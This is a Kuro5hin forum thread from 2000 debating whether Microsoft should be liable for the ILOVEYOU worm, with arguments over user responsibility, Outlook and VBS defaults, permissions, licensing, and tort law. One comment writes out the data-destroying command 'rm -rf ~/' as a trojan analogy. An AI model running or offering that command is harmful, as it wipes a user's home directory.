Kuro5hin.org: technology and culture, from the trenches
create account | help/FAQ | contact | links | search | IRC | site news
[ Everything | Diaries | Technology | Science | Culture | Politics | Media | News | Internet | Op-Ed | Fiction | Meta | MLP ]
We need your support: buy an ad | premium membership

[P]
Should Microsoft Be Responsible For Poor Software?

By mattc in News
Sat May 06, 2000 at 03:47:16 PM EST
Tags: Software (all tags)
Software

I know people are sick of hearing about the "I Love You" virus, but this article from AlterNet makes some interesting points. Should Microsoft be responsible for their poor software?


A friend of mine said that if it were any other company besides Microsoft, they'd be sued for such irresponsible programming. This is certainly not the first time a virus of this type has destroyed Outlook users, and Microsoft is not making any efforts to stop it:
Most revolting is Microsoft's silence. On its Web site (www.microsoft.com), you'll see links to ad nauseum "innovation" rhetoric about why Big Brother is trampling helpless, little Microsoft. But in the immediate aftermath of the worst computer-virus outbreak in history, Microsoft did not tell users to, or how to, disengage that Visual Basic default. Instead, users should know better than to open an "I love you" message, Microsoft security manager Scott Culp told the Associated Press.
Is it really the responsibility of the user to work around Microsoft's failings? Considering the technical ability of the typical Outlook user, I don't think so. Remember when Ford was sued for making trucks with gas tanks that could explode in a crash? Why should computer software manufacturers be immune from responsibility?

Sponsors

Voxel dot net
o Managed Hosting
o VoxCAST Content Delivery
o Raw Infrastructure

Login

Related Links
o this article
o Also by mattc


Display: Sort:
Should Microsoft Be Responsible For Poor Software? | 57 comments (57 topical, editorial, 0 hidden)
I think they should have paid atten... (2.50 / 2) (#12)
by Saint Zero on Sat May 06, 2000 at 10:50:06 AM EST

Saint Zero voted 1 on this story.

I think they should have paid attention to details, rather than blindly innnovate.
---------- Patron Saint of Nothing, really.

If you can sue Ford, you can sue Mi... (3.00 / 1) (#2)
by bmetzler on Sat May 06, 2000 at 11:43:33 AM EST

bmetzler voted 1 on this story.

If you can sue Ford, you can sue Microsoft.

However, I don't think people realize yet that software companies are legally protected. They can do whatever you want and you have no avenue for retrition. Hopefully, with the court case people will start realizing that there is no one responsible for their own software. Then hopefully they'll start using Open Source software, where they can take responsibility themselves.


www.bmetzler.org - it's not just a personal weblog, it's so much more.
Re: If you can sue Ford, you can sue Mi... (none / 0) (#31)
by friedo on Sat May 06, 2000 at 09:30:10 PM EST

A problem with the car analogy is that you can only sue Ford if they were negligent in the car design. If you smash into something because you're drunk, it isn't Ford's fault that they didn't build a drunkness-detection unit into their car. If, on the other hand, you didn't do anything wrong, but suddenly your breakline magically disappears, well, that's another story.

MS likes to argue that it's the ("drunk") user's fault, because they excercised poor judgment in opening an attachment. The question is, has MS been truly negligent with their software design? I'd say so, and they should be responsible if they (knowingly) make it possible for damage to happen.

- friedo
[ Parent ]

Its not a software fault that cause... (2.00 / 1) (#7)
by inspire on Sat May 06, 2000 at 11:49:22 AM EST

inspire voted 1 on this story.

Its not a software fault that caused the love letter worm to spread. It spread because users dont know/care about Trojan viruses. The exact same thing could have happened if I sent a bash script with rm -rf ~/ to a Linux user, and asked them to open it.

This article seems to blame the VBS extensions for the virus, but it could have been done with anything, really. An EXE file is just as, if not more destructive than a VB script, provided you can get the user to open it.

Blame the user, not Microsoft, on this one.
--
What is the helix?

Re: Its not a software fault that cause... (2.00 / 1) (#19)
by Anonymous Hero on Sat May 06, 2000 at 05:35:05 PM EST

Its not a software fault that caused the love letter worm to spread. It spread because users dont know/care about Trojan viruses. The exact same thing could have happened if I sent a bash script with rm -rf ~/ to a Linux user, and asked them to open it.

The exact same thing? Really? Your bash script would have grabbed all the addresses that the user had on the computer and mailed itself to them? It would have overwritten several system libraries? It would have also overwritten every gif, jpeg and html file on the machine, no matter who they belonged to? That's pretty amazing; you obviously know something about bash that I don't.

Now, maybe you have a really different setup on your Linux machine than I do, but if I send your script to myself it just shows me the text of it; it runs nothing. Even if I send a compiled binary, it doesn't give me the option of running it, only saving it to disk. And even then, it doesn't save it as executable. I have to chmod it myself if I actually want to run it. I tested all this on a plain vanilla Debian installation, btw. Nothing like making sure you know what you're talking about before you open your mouth, eh?

I'm sure someone who was really motivated could come up with something that would do some damage to someone. I'm also extremely sure that the kind of carnage we saw with the ILOVEYOU virus isn't going to happen to a Unix based system any time soon. Not that I believe a destructive Unix virus is completely impossible. It's just that it would be so difficult, that the people with the skills to make it happen probably have better things to do with their time.

[ Parent ]

Re: Its not a software fault that cause... (5.00 / 1) (#34)
by inspire on Sat May 06, 2000 at 11:19:44 PM EST

The exact same thing? Really? Your bash script would have grabbed all the addresses that the user had on the computer and mailed itself to them? It would have overwritten several system libraries? It would have also overwritten every gif, jpeg and html file on the machine, no matter who they belonged to? That's pretty amazing; you obviously know something about bash that I don't.

One of the fundamental differences between your average *nix and Windows 95/98 is that the *nix was designed from the ground up as a multiuser system, whilst Windows was designed more for personal use, and as such has no real idea about permissions and the concept of separating root/system files from user accessible files.

As such, the analogy is more accurate if you considered the script to be run as root - you may consider the "anyuser=root" design of Windows to be a bug, but I think it is one of the things that allow people to grasp the concepts of the OS better (not that I necessarily agree with the design, but I can see where Microsoft is coming from when they use that model for their OS).

And as for the functionality of the bash script - yes, it is possible for bash to grep through the addressbook locations of common mailers to find a list of addresses, and (call sendmail and send|directly send) emails to other users.

And it is theoretically, although extremely unlikely possible that the script could exploit some root hole in a program somewhere to get root privileges.

Now, maybe you have a really different setup on your Linux machine than I do, but if I send your script to myself it just shows me the text of it; it runs nothing. Even if I send a compiled binary, it doesn't give me the option of running it, only saving it to disk. And even then, it doesn't save it as executable. I have to chmod it myself if I actually want to run it.

My mailer, KMail, seems to want to run attachments that you send to it as soon as you click on the icon, although as it saves the temp files as 664, it doesnt have the permissions to. You have to right click to save the file somewhere else. The behaviour is pretty broken, though. It's mailer-dependant on what the default behaviour is. I think it should be saving to disk too, but the author doesnt seem to agree with me (not that I've asked...)

I'm sure someone who was really motivated could come up with something that would do some damage to someone. I'm also extremely sure that the kind of carnage we saw with the ILOVEYOU virus isn't going to happen to a Unix based system any time soon. Not that I believe a destructive Unix virus is completely impossible. It's just that it would be so difficult, that the people with the skills to make it happen probably have better things to do with their time.

The problem I have with ILOVEYOU is that it _isnt_ a virus - it's a Trojan worm. As such it requires the user to perform some action to actually activate it (in this case, double-clicking on the attachment).

The issue seems to be here that Windows makes running malicious code easier than Unix. Unix users on a whole seem more informed about the idea of auditing source, and not running unknown executables just because an email tells you to. Windows users on the other hand have always been handed an EXE file, and told 'run this'.

But should Microsoft take the blame for something the user did? I dont think so. The ILOVEYOU mess reminds me of the case where someone walked into a bar, got blind drunk, stepped outside and got injured. He then proceeded to sue the bar for making it too easy for him to drink.

The whole concept of personal responsibility has seem to have gone out the window in society today, with people wanting to blame scapegoats rather than accept that they made a mistake.

Should Microsoft have made it harder to run untrusted executables? Yes. Should they be held liable for damages because they didnt? No.
--
What is the helix?
[ Parent ]

Re: Its not a software fault that cause... (3.00 / 1) (#39)
by theFish on Sun May 07, 2000 at 01:22:26 AM EST

My mailer, KMail, seems to want to run attachments that you send to it as soon as you click on the icon, although as it saves the temp files as 664,

Kmail doesn't work that way on my SuSE system. 664 means there is no execute bit set, so whats your point?

IMNSHO if you design a system as being single user then you should have some safeguards that don't depend on file ownership. Fer crynoutloud even macs have protection of the system and applications folders.

The whole concept of personal responsibility has seem to have gone out the window in society today, with people wanting to blame scapegoats rather than accept that they made a mistake.

So corporations are exempt from responsible behaviour? I have to say your bar analogy was priceless too. It should be " a person walks into a bar and gets the crap kicked out of them for looking at an antisocial drunk who smiles at them first, then sues the liquor distributor that sells absinthe". You can point fingers where ever you want, but Microsoft, who considers them self a great benefactor of the modern age should know better.

[ Parent ]
The first part of the writeup is re... (1.00 / 1) (#3)
by Wil Mahan on Sat May 06, 2000 at 12:02:35 PM EST

Wil Mahan voted -1 on this story.

The first part of the writeup is repeated when the article is viewed.

Re: The first part of the writeup is re... (none / 0) (#30)
by mattc on Sat May 06, 2000 at 08:29:41 PM EST

Yeah, I was a little confused about how the article submission worked. It won't happen again. :-)

[ Parent ]
Interesting point. Not only Microso... (2.00 / 1) (#13)
by ejf on Sat May 06, 2000 at 12:15:11 PM EST

ejf voted 1 on this story.

Interesting point. Not only Microsoft is this irresponsible, though. Almost EVERY commodity software publisher is; ever read the disclaimers ? Microsoft is the one example of a "bad" monopoly though. This is neither the first nor will it be the last such failing from Micro$oft (anybody remember Back Orifice ? Millions of infections, but Microsoft gave out a statement along the lines of "we donīt care, not our business, not our fault" ...)
--- men are reasoning, not reasonable animals.

Down with MS! Actually ... the post... (1.00 / 1) (#14)
by jdiggans on Sat May 06, 2000 at 12:52:55 PM EST

jdiggans voted 1 on this story.

Down with MS! Actually ... the post makes some good points, and the linked article is quite an interesting read.

Take Gates and Ballmer out behind t... (1.00 / 1) (#6)
by marlowe on Sat May 06, 2000 at 01:05:59 PM EST

marlowe voted 1 on this story.

Take Gates and Ballmer out behind the woodshed and spank them.
-- The Americans are the Jews of the 21st century. Only we won't go as quietly to the gas chambers. --

I have long wondered why MS include... (4.00 / 1) (#4)
by evro on Sat May 06, 2000 at 01:25:13 PM EST

evro voted 1 on this story.

I have long wondered why MS includes things like ActiveX, which lets supposedly 'trusted' websites run programs on your computer, and has them turned on by default. I have a Mac, so this isn't a problem for me, but there has never been a single case, in my entire life, where I have said, "Boy, I wish www.whatever.com could open up MS word for me!" Do a search at any of the major news sites for ActiveX and most of the results will be stories about how ActiveX was used to invade a computer and do something bad. However, in this case, people were being emailed a file and they did have to doubleclick on it. It seems to me that this is the same as if everybody had been emailed a compiled executable. If a program has the ability to do bad things to a system, I think it's the system owner's responsibility not to run the program. As I understand it, VB is a scripting language for Windows, generally used to make common tasks simpler. Basically a macro language (and we all know MS's track record with macro languages). So, yeah, VB probably is given too much free reign over the system, but I would imagine a program written in C and dubbed "ILOVEYOU.exe" would meet the same results.
---
"Asking me who to follow -- don't ask me, I don't know!"

Re: I have long wondered why MS include... (2.00 / 1) (#16)
by tidepool on Sat May 06, 2000 at 04:51:00 PM EST

Yeah - but in order to write the virus in C, the original programmer would have to have a slightly higher clue level - above that of your 'typical' vbs virus writer. No?
-Ben

[ Parent ]
the same for Mac & look at the code.. (4.00 / 1) (#22)
by driph on Sat May 06, 2000 at 06:27:45 PM EST

Well, the same thing could be done in say RealBASIC, and you could do some damage with Applescript as well, with limited knowledge.

We went through the virus at work, and it's simple, but still pretty slick.. But for it to work, and the winbugfix.exe step to work as well, it relies totally on social engineering.. by the way, if any of you want to see the gist of the script, I've got the fix online at http://flummox.com/fix.vbs. It's more or less just the reverse of the iloveyou.



--
Vegas isn't a liberal stronghold. It's the place where the rich and powerful gamble away their company's pension fund and strangle call girls in their hotel rooms. - Psycho Dave
[ Parent ]
Re: the same for Mac & look at the code.. (3.00 / 1) (#45)
by CmdrPinkTaco on Sun May 07, 2000 at 01:36:20 PM EST

Call me paranoid (auidence: "PARANOID"; me: "thanks") but from what I have heard, it is overwriting most types of media files. I have been avoiding Napster/Gnutella/IRC(not so much IRC, I know how to say NO to a d/l) because I have heard rumors of people getting "a little bit o' love" through these channels. Any confirmation on this or should I go out and buy a two weeks supply of MP3s and jpegs just incase it is a worst case scenario?

I don't want to die just yet (at least not with out filling my hard drive needlessly with poorly copied Brittany Spears songs)
--
Guess CmdrPinkTaco's .sig and win - nothing :)
[ Parent ]
Re: the risks, etc.. (none / 0) (#55)
by driph on Sun May 07, 2000 at 08:40:32 PM EST

Well, the only way you are going to have a problem with it is if you actually run the script. It's a visual basic script,( .vbs ) so the only way it's going to work its magic is if you tell it to(by doubleclicking it, for example).

Yes, it does affect quite a few different kinds of files, although the interesting thing is that it doesnt actually delete mp3 files, it just makes them hidden (although it does toss jpgs, vbe, vbs, etc etc..)

So basically, I wouldn't really worry about it. As always, just be careful of what you download and run on your machine.

--
Vegas isn't a liberal stronghold. It's the place where the rich and powerful gamble away their company's pension fund and strangle call girls in their hotel rooms. - Psycho Dave
[ Parent ]
I say companies should be responsib... (2.00 / 1) (#8)
by End on Sat May 06, 2000 at 01:25:56 PM EST

End voted 0 on this story.

I say companies should be responsible for their own mistakes in choosing a buggy, poorly-designed product.

-JD

Also: culpability in furthering the exploit? (none / 0) (#51)
by kmself on Sun May 07, 2000 at 04:55:18 PM EST

There's a certain smug satisfaction in saying users ought to lie in the beds they've made in choosing software demonstrated for well over a year to have readily exploitable major defects. Melissa, last year, clearly showed that the Outlook/VBA combination was a poweder keg waiting for a spark.

Above and beyond this, I've addressed the possible vendor third-party liability, it might be interesting as well to look into whether or not users of demonstrably faulty software might also be responsible for the damage caused as an eploit is leveraged through their own systems on "aiding and abetting" grounds.

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

The evils of big corporations +1 ... (1.00 / 1) (#11)
by MadDreamer on Sat May 06, 2000 at 02:54:31 PM EST

MadDreamer voted 0 on this story.

The evils of big corporations +1
But, it's Microsoft, so it's nothing new -1
And anyone with half a brain should have known that you don't download attachments from people you don't know!! (rant, +-0)

Not the point! (3.50 / 2) (#18)
by Anonymous Hero on Sat May 06, 2000 at 05:32:28 PM EST

You're wrong. A lot of these attachments came from people they DID know. Since it scanned the Outlook "phonebook", it sent them to known friends and family. The virus could have just as easily come from "Mom" as from "HakerD00d@AOL.com"

I find it humorous that Microsoft used to say "Don't download programs from untrusted sources" when viruses used to show up in games downloaded off the internet.

What could be a more trusted source than an email from mom or dad?

They've even had to drop that lame excuse on this one.
Hang on, I'm almost done laughing.



[ Parent ]

There is probably a clause in their... (2.00 / 1) (#1)
by joeyo on Sat May 06, 2000 at 02:54:34 PM EST

joeyo voted 1 on this story.

There is probably a clause in their "shrink-wrap licensing" which protects them from all liability. And from what I read on that other weblog today, shrink-wrap licenses have been held up in court.

--
"Give me enough variables to work with, and I can probably do away with the notion of human free will." -- demi

Third-party liability? (none / 0) (#50)
by kmself on Sun May 07, 2000 at 04:37:13 PM EST

Problem (for MSFT) is that I don't believe shrinkwrap has any authority over third-party liability. An exploit such as Melissa or LoveLetter, while requiring MSFT "features" to propogate, can affect systems completely free of MSFT products through overloading or other DoS effects.

Similarly, for enterprises (emergency response centers, businesses, etc.) which are compromized as a result of such tertiary effects. Again, if there is no direct contract between the enterprise and the software vendor, I'd think the EULA terms would have no effect. The vendor might then bear liability for consequences if it is found to be negligent in design or execution of a product.

IANAL, this is not legal advice. I'd appreciate any more informed opinions on this topic.

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

Correction. If it were anyone but M... (2.50 / 2) (#5)
by Ozymandias on Sat May 06, 2000 at 03:15:41 PM EST

Ozymandias voted 1 on this story.

Correction. If it were anyone but Microsoft, we'd be blaming the worthless piece of scum who created the virus.
- Ozymandias

I disagree... (none / 0) (#42)
by Paradox on Sun May 07, 2000 at 03:09:39 AM EST

Microsoft has a different form of responsibility than most software vendors. They know full well their default settings are what most unskilled users run. Why have executable attachments anyways? After the LAST run with this, they should have removed that feature from the defaults. But NOOOO. Of course not.

Please. Now.. I blame the people who make ssh when a new buffer overflow is found. Don't you? How about the apache group for a security hole in the code? Hrrm. Sure.. I hate script kiddiez as much as the next hacker, but ultimatly they are not at fault (they are victims of a stupidity complex of horrific proportions :), but I think at least their stupid small time cracks help shore up software against real threats.
Dave "Paradox" Fayram

print print join q( ), split(q,q,,reverse qq;#qsti
qq)\;qlre;.q.pqevolqiqdog.);#1 reason to grin at Perl
print "\n";
[ Parent ]
Microsoft users an amazing toleranc... (3.00 / 1) (#10)
by Paradox on Sat May 06, 2000 at 03:32:15 PM EST

Paradox voted 1 on this story.

Microsoft users an amazing tolerance for things. Somehow, MS has convinced every single one of its users that it is the users responsibility when something goes wrong. Usually, this is not the case. Recently, Mutt trashed a mailbox that was kinda important to me. It was Mutt's fault, not mine. In these cases, users shouldn't have to be afraid of opening an email attachment. It's dumb.

MS is in a unique position. Their software is everywhere. Their default security settings are the common level. MS has a certain amount of responsibility above and beyond the average software development company in this case. Maybe not legally, but ethically. Hopefully we'll see some neat new laws coming into effect about this.

People in this situation have no recourse. Microsoft's Liscence is pretty clear about what happens if your system goes boom.


Dave "Paradox" Fayram

print print join q( ), split(q,q,,reverse qq;#qsti
qq)\;qlre;.q.pqevolqiqdog.);#1 reason to grin at Perl
print "\n";
It was General Motors that was sued... (2.00 / 1) (#9)
by buzzbomb on Sat May 06, 2000 at 03:43:25 PM EST

buzzbomb voted 1 on this story.

It was General Motors that was sued for the trucks with the shady gas tanks...not Ford. Oh and...piss on Microsoft and their shitty software.

Re: It was General Motors that was sued... (none / 0) (#17)
by Anonymous Hero on Sat May 06, 2000 at 04:57:32 PM EST

I think the author was confusing two different lawsuits. Ford was sued (successfully) for a problem that caused the gas tanks in Pintos to explode when rear ended under certain conditions. It was found during the trial that Ford knew about the problem, but didn't fix it because they thought the cost of settling the resulting liability suits would be less than the cost of a recall.

While GM was also sued, evidence given during the trial (by the plaintiffs, no less) showed that the gas tanks in their trucks were no more likely to explode in a side impact than in any other trucks. Of course this doesn't mean they won the suit (I don't know what the outcome was); after all, to this day there isn't a single piece of empirical evidence that breast implants cause anything other than larger, gravity defying breasts, and look how much cash Dow Corning has had to shell out.

[ Parent ]

Re: It was General Motors that was sued... (none / 0) (#21)
by Anonymous Hero on Sat May 06, 2000 at 06:10:59 PM EST

Yeah, cos the only way they could get them to explode was to strap incendiary devices to them, and ignite them right before the crash. Dateline had to give a big retraction and apology for their reporting of it too, unless I'm completely mistaken. Hell, mebbe it was Dateline that rigged the whole thing. Or mebbe I'm just talkin outta my ass. Too lazy to go look up the details :)

[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (2.00 / 1) (#15)
by pb on Sat May 06, 2000 at 04:41:15 PM EST

There's something similar on Slashdot now, too.

I already posted my comment there, so suffice it to say my answer was "Yes, they should be." :)
---
"See what the drooling, ravening, flesh-eating hordes^W^W^W^WKuro5hin.org readers have to say."
-- pwhysall

Re: Should Microsoft Be Responsible For Poor Softw (2.50 / 2) (#20)
by Eldritch on Sat May 06, 2000 at 06:07:24 PM EST

Problem is that users like 'links'. They see a new attachment, the click it and the relative application loads it or runs it. Its called ease of use. All this trojan has done is to highlight the security holes in Windows 9x (not NT, it can be really well locked down) because the user can erase anything on the local disk. Oh yeah, it also shows a major hole in Outlook by letting the trojan scan your address book! But a lot of it comes down to user error. If anyone emailed me a .pl file, I'd take the time to examine it first. Most MS users doen't know what a .vbs file is or does but they still clicked on it. And this shows that users just are not trained enough.

Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#37)
by your_desired_username on Sat May 06, 2000 at 11:58:23 PM EST

Do you examine everything you download from freshmeat?

[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#43)
by Eldritch on Sun May 07, 2000 at 07:18:24 AM EST

Nope. But then I downloaded it, people don't send it to me. C'mon, use that grey matter up there.

[ Parent ]
hackers do not use visual basic (1.00 / 2) (#23)
by TomG on Sat May 06, 2000 at 06:30:06 PM EST

So the story must mean crackers. It's at that point I stop reading and go to some place else that won't waste my time.

Re: hackers do not use visual basic (none / 0) (#26)
by Perpetual Newbie on Sat May 06, 2000 at 06:53:44 PM EST

hackers do not use visual basic

The majority of VB users may not be hackers, but it is not impossible to hack with VB, just as one can hack with Pascal, Perl, or Python. That Other Site once had a story about a guy that wired his whole house(front door, fridge, toilet, trashcan, etc) and hooked it up to the Internet, using VB to write the software to run the whole thing.

So the story must mean crackers.

DeCSS aside, I am unaware of the prevalence of the use of Basic for breaking encryption and copy-protection algorithms.

[ Parent ]

Re: hackers do not use visual basic (none / 0) (#36)
by TomG on Sat May 06, 2000 at 11:58:16 PM EST

Cracking isn't just breaking copy protection and the like, cracking means breaking into just about anything, and people who do this for infantile reasons, are called crackers.

[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (4.00 / 2) (#27)
by Perpetual Newbie on Sat May 06, 2000 at 06:56:01 PM EST

I think a software company should be liable, but only if the product is currently being developed/supported, and if the devoloper either refused to fix the bug at their cost, refused to acknowledge the bug, or took action to delay fixing the bug or attempted to pass this cost onto the customer. Were I a politician, the law I would write would be something like this.

But then of course, what would you define a bug as? Microsoft has known about this bug for at least three years, but unlike the rest of the world they do not consider it a bug, but an important feature of their program. Do missing features count as a bug? Does a slow but functioning implementation of a feature count as a bug? Does a program that lacks documentation count as a bug?

Despite what the Washington state supreme court thinks, I am of the opinion that shrinkwraps should not be enforcable because the software maker is forcing conditions upon the user after the user has already paid for the software. If the user refuses the new conditions, the software maker doesn't allow them access to the product and keeps their money.

Re: Should Microsoft Be Responsible For Poor Softw (4.00 / 1) (#29)
by Anonymous Hero on Sat May 06, 2000 at 08:24:25 PM EST

But then of course, what would you define a bug as? Microsoft has known about this bug for at least three years, but unlike the rest of the world they do not consider it a bug, but an important feature of their program.

I think a better question would be whether or not other programs or operating systems manage to offer similar functionality without the massive security holes. Since in this case the answer is yes, then I think you can make a good case that Microsoft has been negligent and should be held responsible for such.

As far as the Washington Supreme Court decision, it's not as clear as it sounds at first. The company suing had several opportunities to see the license before using the software, they had bought earlier versions of the program involved for several years under the same licensing terms, and when the error occured that caused the problem, they went ahead and used the result returned by the program despite the fact that the program told them 19 times that there was an error.

BTW, for those who care about such things, reading the court's opinion will show you that Microsoft has indeed been sued for such things (and won). It's also worth noting that the court says that since such licensces are standard in the software industry, and people keep buying software, that the licenses are by definition fair (otherwise people wouldn't use the software). They also say pretty strongly that as long as the vendor gives the option of a refund, they don't have to tell you what the licensing terms are at the time of sale.

Basically, what it comes down to is that the software vendor isn't responsible for any bugs in its software; you are. If you don't like it, your only recourse seems to be to use software whose innards are available for everyone to see, so nasty bugs like this can be found out and users notified of their existence.

[ Parent ]

Bug v. hazard (5.00 / 1) (#53)
by kmself on Sun May 07, 2000 at 06:22:22 PM EST

The usual definition of a software bug is "failure to perform per specification". By that metric, LoveLetter is not a bug, it's a feature. Calling for culpability for Microsoft on the grounds that this is a bug would fail.

However, as Anonymous Hero notes in #29, another metric would be whether or not software with similar core functionality has similar exploits. As mentioned elsewhere, the MS Outlook/VBA combination is a poweder keg waiting for a spark. There is a fairly well established notion of "attractive nuisance" .

For the benefit of readers, some definitions from Black's Law Dictionary (pocket edition):

attractive-nuisance doctrine. In tort law, the rule that a person who owns property with a dangerous instrumentality or condition that will forseeably lure children to trespass is under a duty to protect those children from the dangerous attraction -- Also termed turntable doctrine. See "dangerous instrumentality"

dangerous instrumentality. An instrument, substance, or condition so inherently dangerous that it may cause serious bodily injury or death without human use or interference; it may sere as the basis for strict liability. See attractive-nuisance doctrine Cf: deadly weapon.

nuisance. 1. Anything that annoys or disturbs the use or enjoyment of property. 2. Use of one's own property in a way that annoys or disturbs others' use or enjoyment of perperty.

Subdefinitions:
anticipatory nuisance. An activity that, although not yet at the level of a nuisance, is very likely to become one, so that a party may obtain an injunction prohibiting the activity.

nuisance in fact. A nuisance existing because of the circumstances of the use or the particular location.

public nuisance. A nuisance that interferes with a communal right and that may lead to civil injunction or criminal prosecution. Also termed common nuisance.

turntable doctrine. This term gets its name from the enticing yet dangerous qualities of railroad turntables, which have frequently been the subject of litigation.

KMS: Interesting. We return once again to the genesis of antitrust actions -- the railroad "robber barrons" of the 19th century, vis-a-vis Microsoft.

From these definitions, it seems that there are reasonably good grounds for holding both Micorosft and its customers liable for the damanges resulting from either abuse or misuse of MS Outlook/VBA.

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

Re: Should Microsoft Be Responsible For Poor Softw (3.00 / 2) (#28)
by KuroiNeko on Sat May 06, 2000 at 07:49:35 PM EST

Umh, well.... Yes, and no. If developers were sued for
bugs, our craft would whither fast. Instead of working on
new releases we'd be spending our time in courts. Because,
let's face it, perfect software is barely affordable, if
possible at all.
Things aren't good or bad by themselves. Knife can be
used to slice bread, or to kill someone.
IMNSHO the problem is with the lack of personal
responsibility. Site administrators should've known about
possible expolits of Outlook, and they had to take their
steps. Employees are not supposed to read love letters at
the office.
In perfect world, as I see it, the author of this worm
would be punished only for direct losses, ie damages made
on the sites he'd sent to directly. Companies that were
paralyzed should start with their employees. Big Bro? No.
Just discipline.
As to MS, I dunno, whether there could be one in perfect
world :)
KuroiNeko
Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#38)
by theFish on Sun May 07, 2000 at 12:55:36 AM EST

You make an interesting point. Regardless of the fact that the default settings in windows leave a lot of doors open, IT managers should see to it that machines are locked down a little better before deploying them. Let's take a trip to a fantasy world where we replace MS with RedHat....

A new sendmail exploit takes out Sally's desktop machine and cascades through the organization... there would be some questions as to why desktop machines are running sendmail to begin with.

Back to reality... The problem is not so much that Windows is (insert opinion here), but more that the _default_ settings blow. MS could improve their products greatly in my eyes just by _turning_off_ the bells and whistles out of the box.

Disclaimer -- I'm not a fan of RedHat either

[ Parent ]
Liability & professional malpractice (3.00 / 1) (#49)
by kmself on Sun May 07, 2000 at 04:24:50 PM EST

If developers were sued for bugs, our craft would whither fast. Instead of working on new releases we'd be spending our time in courts.

Doctors, lawyers, and engineers (the real sort, none of this namby-pamby "software engineer" stuff) have dealt with professional malpractice for years. It's not a part of the profession that is enjoyed (talk to a doctor about lawyers sometime), but it does help keep folks honest. It's called responsibility. From the standpoint of the small contracting firm, you're probably in this situation already. To help ease the administrative burden, there is a little thing called professional liability insurance, and your attourney Bernie.

There are certain actions which inherently carry significant consequences, often well beyond the control of the original designer, though they may be anticipated. Dams risk failure and flooding. Airplanes risk collisions, crashes, and bad weather. Nuclear power plants risk radiation emission, core meltdown, and worse. Global communications networks risk congestion.

Failure to take reasonable steps to minimize these risks is, IMVAO, professional negligence.

--
Karsten M. Self
SCO -- backgrounder on Caldera/SCO vs IBM
Support the EFF!!
There is no K5 cabal.
[ Parent ]

Re: Liability & professional malpractice (none / 0) (#59)
by KuroiNeko on Mon May 08, 2000 at 04:18:09 PM EST

Well, I mean bugs, ie inability to operate per specs.
Professional responsibility is more broad. We'd probably
talk about `mistakes', ie product failures to operate
harmlessly. Eg, I wrote a big and complex program. It
operates as described, but it has an annoying flaw, its
main loop is built around a lousy select() statement
that never actually sleeps. It his a bug? No, it does what
it's written for. Is this a mistake? Yes, because it eats
CPU cycles and may cause major slowdowns on busy sites.
If a physician makes a mistake, patient will feel that.
If aircraft designer makes a mistake, pilot will definitely
notice it. The difference is that, unlike with the vast
majority of modern software, doctors and designers work
for trained end users. J. Random Luser could run my program
for ages without noticing anything.
In Open Source world, professional responsibilty becomes
personal. This is an important issue which, I believe,
deserves a separate thread.
However, I'm still not sure whether this is applicable
to MS in this particular case. It's impossible to hold
someone responsible for introducing a feature. It only
makes sense if the feature is designed/implemented
with bugs/mistakes. Chest-beating is not an argument, if
we dare to judge, we need a thorough analysis.
At any rate, whether or not MS is in any sense responsible
for what had happened, site admins and employees whose
laziness and ignorance let the worm spread are guilty, at
least- morally.
KuroiNeko
[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (3.00 / 1) (#32)
by Anonymous Hero on Sat May 06, 2000 at 09:45:06 PM EST

Well, many distributions of Linux and Unix have been shipped with huge holes in them, and I don't see those companies getting sued. I can't even imagine how many people have probably gotten cracked because a broken service was kept running.

Of course, such exploits don't usually re-distribute themselves, and are not usually made by people with low levels of expetise..



Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#33)
by Anonymous Hero on Sat May 06, 2000 at 11:04:42 PM EST

Well, there are a couple of differences there. Most of the 'huge holes' you hear about are standard services that have been offered with Unix for quite some time. I don't think it's beyond the realm of reason to expect the person who installs a Unix system to have some idea what he/she is doing, and to disable services as appropriate. Red Hat, for instance, primarily positions itself as a desktop distribution. If you use it out of the box as a firewall, I think it's fair to say they're not responsible for your ignorance.

While there have been legitimate security holes, they tend to get fixed quickly in the free unices; I don't know what the track records of the proprietary systems are, but I would expect they're not as good. As you pointed out, these holes also take a much higher level of expertise to exploit. However, if Sun knew of a glaring security hole in Solaris, didn't notify its customers, and something like this resulted from it, don't you think they should hold some responsibility? I do. That goes for Linux vendors as well.

It bothers me that everyone seems to ignore the following points:

  • This sorry excuse for security is designed into the system on purpose.
  • The default state is to have the exploitable services on, despite the fact that most customers don't use them, and the customer isn't notified that the vulnerabilities exist.
  • Microsoft has known for several years that these vulnerabilities exist, and refuses to do anything about it. Even something as simple as defaulting it to off so that only people who know they need it have it on would go a long way toward preventing this sort of incident.
  • Other programs and systems manage to give similar capabilities to their users without opening up such massive holes.
  • Even if you can find ways of rationalizing the above, and say that other systems have similar vulnerabilities, I don't think you can ignore that Microsoft created and refuses to fix a vulnerability that allowed a single individual to bring down machines and networks all over the world literally overnight. If they were in any other industry, this would be enough to put them out of business.
You can say all you want about the ignorance of the users, and the maliciousness of the virus writer. And you'd be right. But it in no way excuses Microsoft for creating such enormously damaging vulnerabilities where previous to their actions, no vulnerabilities at all existed.

[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#35)
by inspire on Sat May 06, 2000 at 11:41:49 PM EST

But it in no way excuses Microsoft for creating such enormously damaging vulnerabilities where previous to their actions, no vulnerabilities at all existed.

Eh? Trojans and viruses didnt exist before Microsoft created Outlook Express as an infection vector?
--
What is the helix?
[ Parent ]

Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#41)
by Anonymous Hero on Sun May 07, 2000 at 01:38:47 AM EST

yeah, that's what I said.... just ignore the paragraphs above it. My, ain't you clever...

[ Parent ]
Re: Should Microsoft Be Responsible For Poor Softw (none / 0) (#56)
by inspire on Sun May 07, 2000 at 08:58:01 PM EST

yeah, that's what I said.... just ignore the paragraphs above it. My, ain't you clever...

That was my only point of contention. I agree with everything you said above that.
--
What is the helix?
[ Parent ]

What does 'ILUVYOU' have to do with software liabi (2.00 / 1) (#40)
